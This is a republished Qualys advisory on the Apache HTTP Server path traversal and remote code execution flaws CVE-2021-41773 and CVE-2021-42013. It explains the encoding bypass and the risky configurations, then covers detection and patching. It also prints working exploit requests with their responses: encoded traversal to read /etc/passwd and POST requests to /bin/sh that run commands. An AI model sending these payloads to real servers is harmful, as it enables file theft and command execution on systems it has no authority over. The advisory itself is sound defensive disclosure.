Apache HTTP Server Path Traversal & Remote Code Execution (CVE-2021-41773 & CVE-2021-42013) – Marketscreener.com

twitter MS fdgris ProxyEgg Apache HTTP Server Path Traversal & Remote Code Execution (CVE-2021-41773 & CVE-2021-42013) - Marketscreener.com

On October 4, 2021, Apache HTTP Server Project released Security advisory on a Path traversal and File disclosure vulnerability in Apache HTTP Server 2.4.49 and 2.4.50 tracked as CVE-2021-41773 and CVE-2021-42013. In the advisory, Apache also highlighted “the issue is known to be exploited in the wild” and later it was identified that the vulnerability can be abused to perform remote code execution. For exploiting both the vulnerabilities Apache HTTP server must be running in non-default configuration.

As the vulnerabilities are configuration dependent, checking the version of Apache web server is not enough to identify vulnerable servers. With both the CVEs being actively exploited, Qualys Web Application Scanning has released QID 150372, 150373, 150374 which sends specially crafted HTTP request to the target server to determine if it is exploitable. Once successfully detected, users can remediate the vulnerabilities by upgrading to Apache HTTP Sever 2.4.51 or greater.

About CVE-2021-41773

According to CVE-2021-41773, Apache HTTP Server 2.4.49 is vulnerable to Path Traversal and Remote Code execution attacks.

Path Traversal Analysis

The path traversal vulnerability was introduced due to the new code change added for path normalization i.e., for URL paths to remove unwanted or dangerous parts from the pathname, but it was inadequate to detect different techniques of encoding the path traversal characters “dot-dot-slash (../)”

To prevent path traversal attacks, the normalization function which is responsible to resolve URL-encoded values from the requested URI, resolved Unicode values one at a time. Hence when URL encoding the second dot as %2e , the logic fails to recognize %2e as dot thereby not decoding it, this converts the characters ../ to .%2e/ and bypasses the check.

Along with Path traversal check bypass, for an Apache HTTP server to be vulnerable, the HTTP Server configuration should either contain the directory directive for entire server’s filesystem as Require all granted or the directory directive should be completely missing from the configuration file.

Vulnerable Configuration:

Require all granted 

Therefore, bypassing the dot-dot check as .%2e and chaining it with misconfigured directory directive allows an attacker to read arbitrary files such as passwd from the vulnerable server file system.

Exploitation: Path Traversal

Request:

GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 08:13:02 GMT
Server: Apache/2.4.49 (Unix)
Last-Modified: Mon, 27 Sep 2021 00:00:00 GMT
ETag: "39e-5cceec7356000"
Accept-Ranges: bytes
Content-Length: 926
Connection: close
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

Please note that the default configuration of Apache HTTP server has the entire filesystem directory directive configured as Require all denied and hence is not vulnerable.

Remote Code Execution Analysis

While CVE-2021-41773 was initially documented as Path traversal and File disclosure vulnerability additional research concluded that the vulnerability can be further exploited to conduct remote code execution when mod_cgi module is enabled on the Apache HTTP server, this allows an attacker to leverage the path traversal vulnerability and call any binary on the system using HTTP POST requests.

Configuration to enable mod_cgi module:

LoadModule cgid_module modules/mod_cgid.so

By default the mod_cgi module is disabled on Apache HTTP server by commenting the above line in the configuration file. Hence, when mod_cgi is enabled and “Require all granted” config is applied to the filesystem directory directive then an attacker can remotely execute commands on the Apache server.

Exploitation: Remote Code Execution

Request:

POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Content-Length: 7
Content-Type: application/x-www-form-urlencoded
Connection: close
echo;id

Response:

HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 09:58:23 GMT
Server: Apache/2.4.49 (Unix)
Connection: close
Content-Length: 45
uid=1(daemon) gid=1(daemon) groups=1(daemon)

Looking at the HTTP POST request for RCE, we can understand /bin/sh is the system binary that executes the payload echo;id and print the output of id command in response.

About CVE-2021-42013

CVE-2021-42013 was introduced as the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient as it did not cover double URL encoding, therefore the vulnerable configurations remained the same, but payload used in 2.4.49 was double URL encoded in 2.4.50 to administer the same path traversal and remote code execution attack.

The attack in 2.4.49 initially encoded the second dot (.) to %2e and the same was double URL encoded into %%32%65 for version 2.4.50

Encoding Analysis

Conversion: dot → %2e → %%32%65

  • 2 is encoded to %32
  • e is encoded to %65
  • And original % left as it is

Thus a dot is equivalent to %%32%65 which eventually converts ../ in double URL encode format as %%32%65%%32%65/

Exploitation: Path Traversal

Request:

GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 10:16:51 GMT
Server: Apache/2.4.50 (Unix)
Last-Modified: Mon, 27 Sep 2021 00:00:00 GMT
ETag: "39e-5cceec7356000"
Accept-Ranges: bytes
Content-Length: 926
Connection: close
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

Exploitation: Remote Code Execution

Request:

POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
echo;id

Response:

HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 10:42:40 GMT
Server: Apache/2.4.50 (Unix)
Connection: close
Content-Length: 45
uid=1(daemon) gid=1(daemon) groups=1(daemon)

Detecting the Vulnerabilities with Qualys WAS

Customers can detect these vulnerabilities with Qualys Web Application Scanning using the following QIDs:

  • 150372: Apache HTTP Server Path Traversal (CVE-2021-41773)
  • 150373: Apache HTTP Server Remote Code Execution (CVE-2021-41773)
  • 150374: Apache HTTP Server Multiple Vulnerabilities (CVE-2021-42013)

QID 150372 – Apache HTTP Server Path Traversal (CVE-2021-41773)

Report

Once the vulnerability is successfully detected by Qualys WAS, users shall see similar kind of results for QID 150372 in the vulnerability scan report:

Solution

Organizations using Apache HTTP Server 2.4.49 or 2.4.50 are advised to upgrade to HTTP Server 2.5.51 or later version to remediate CVE-2021-41773 & CVE-2021-42013, more information can be referred at Apache Security advisory.

For maintaining best security practices, Qualys also advises users to ensure the following:

  • mod_cgi module is disabled by default unless the business requires it.
  • filesystem directory directive to be updated with Require all denied as show below:
Require all denied 

Credits

Apache Security advisory:

https://httpd.apache.org/security/vulnerabilities_24.html

CVE Details:

https://nvd.nist.gov/vuln/detail/CVE-2021-41773
https://nvd.nist.gov/vuln/detail/CVE-2021-42013

Credits for the vulnerability discovery go to:

  • Ash Daulton along with the cPanel Security Team
  • Juan Escobar from Dreamlab Technologies
  • Fernando Muñoz from NULL Life CTF Team
  • Shungo Kumasaka and Nattapon Jongcharoen

References:

Contributor

Jyoti Raval, Lead Web Application Security Analyst, Qualys

Attachments

Disclaimer

Qualys Inc. published this content on 27 October 2021 and is solely responsible for the information contained therein. Distributed by Public, unedited and unaltered, on 28 October 2021 06:30:03 UTC.

Source of this news: https://www.marketscreener.com/quote/stock/QUALYS-INC-11612572/news/Apache-HTTP-Server-Path-Traversal-Remote-Code-Execution-CVE-2021-41773-CVE-2021-42013-36808414/

Related posts:

Proven methods to Set up a Proxy Ip of 2022 [April] - BollyInside
This tutorial relates to the How to Set up a nice Proxy Server. We will do our utmost so that you understand this guide. Discover ways to you like this blog How to Set up a Proxy Server . If y...
Proxy Chrome Extension – Installation Guide - Alpha News Call
A study conducted in 2018 revealed that approximately 26% of global internet users hide behind a virtual private network (VPN) or proxy while on the internet. While the percentage has grown signific...
Form 425 Broadscale Acquisition Filed by: Broadscale Acquisition Corp. - StreetInsider.com
News and research before you hear about it on CNBC and others. Claim your 1-week free trial to StreetInsider Premium here. UNITED STATES SECURITIES AND EXCHANGE COMMISSION Washington, D.C. 20549 ...
Deposit - proxy utility by just STASH NETWORKS LIMITED instant AppAdvice
Put is a rule-based proxy program with multiple proxy method support. tutorial Handle TCP / UDP / ICMP traffic and simply forward to any proxy - Native UI dash to display HTTP / HTTPS / TCP re...
The meaning of proxy server because why you should use it - Techstory
A proxy — is a server that runs between the patient and the web, encrypting actual address of a client. It can benefit to prevent cyberattacks, protecting registered users from malware and ann...
How to Install Etherpad Lite on Ubuntu 20.04 LTS - H2S Media
Learn the steps to install and use Etherpad on Ubuntu 20.04 focal fossa /18.04 Bionic Beaver LTS/ Debian Linux distros for a free and open-source collaborative text editor. EtherPad is a real-tim...
5 Reasons to use proxies with sneaker bots - Business MattersBusiness Matters
@media screen and (min-width: 1201px) { .tzdlt60e2cb5b3eedc { display: none; } } @media screen and (min-width: 993px) and (max-width: 1200px) { .tzdlt60e2cb5b3eedc { display: none; } } @media screen...
You should VPN: How to choose the best VPN? - Augusta Free Drive
In print Tuesday, Sep. 14, 2021, 11: 00 am Join the system AFP's 100, 000+ proponents on Delicious Sale made a request to AFP Subscribe to AFP podcasts on iTunes and after that Spot...
12 Best Proxy Servers Review [Upd. May'21] - Top Proxy Service in 2021 [Free and Paid] - hackernoon....
Privacy and data security are crucial for every Internet user. We all want to keep personal information secure and protect the internal network from any threats or undesirable attacks. That is why so ...
We found a massive spam operation — and sunk its server - TechCrunch
For ten days in March, millions were caught in the same massive spam campaign. Each email looked like it came from someone the recipient knew: the spammer took stolen email addresses and passwords, q...
Why Use A Proxy? - iProgrammer
A proxy server provides a gateway between users and the internet and therefore offers a range of advantages - both for access and for security. We examine the question, "Why Would You WANT A Proxy?" ...
How to Fix Roblox Error Code 282 and 522 on Windows PC - TWCN Tech News
Roblox is an online gaming platform that enables gaming enthusiasts to play a variety of games. While most of the time you enjoy a hassle-free experience, it is not unusual to encounter errors on Rob...
Oxygen-dependent changes in binding partners in addition to the post-translational modifications reg...
Pleasing and suppressing HIFs Cells respond and adapt to hypoxia (low oxygen) in part by activating often the α subunits of the HIF family of transcription factors. Daly et geologi. perfor...
Network Server Management: Datadog vs. NetCrunch | ENP - EnterpriseNetworkingPlanet
A server is a segment of computer hardware or software that provides functionality such as computing resources, data, programs, and services for other programs or devices called clients. This archite...
Benefits of Proxy Servers for eCommerce Businesses - Business MattersBusiness Matters
@media screen and (min-width: 1201px) { .ouyst61e3a489cc581 { display: none; } } @media screen and (min-width: 993px) and (max-width: 1200px) { .ouyst61e3a489cc581 { display: none; } } @media screen...
Amazon Prime Blocking Vpn: How To Fix Http Proxy Error - Analytics Insight
what to do when Amazon Prime is giving an HTTP Proxy Error? Check out solutions hereAre you still unable to access American Amazon Prime from Australia even after changing your IP address using a VPN...
GSI Technology : 2021 Annual Report and Proxy Statement - Marketscreener.com
Fiscal 2021 Annual Report and Proxy Statement July 19, 2021 To Our Stockholders: Fiscal Year 2021 was a year of new opportunities in the face of a global pandemic that impacted all ...
New differential fuzzing tool reveals novel HTTP request smuggling techniques - The Daily Swig
White paper systematically examines the attack while showcasing a ‘laundry list’ of new flaws Researchers have released a new fuzzing tool used for finding novel HTTP request smuggling techni...

IP Rotating Proxy Onsale

SPECIAL LIMITED TIME OFFER

00
Months
00
Days
00
Hours
00
Minutes
00
Seconds
First month free with coupon code FREE30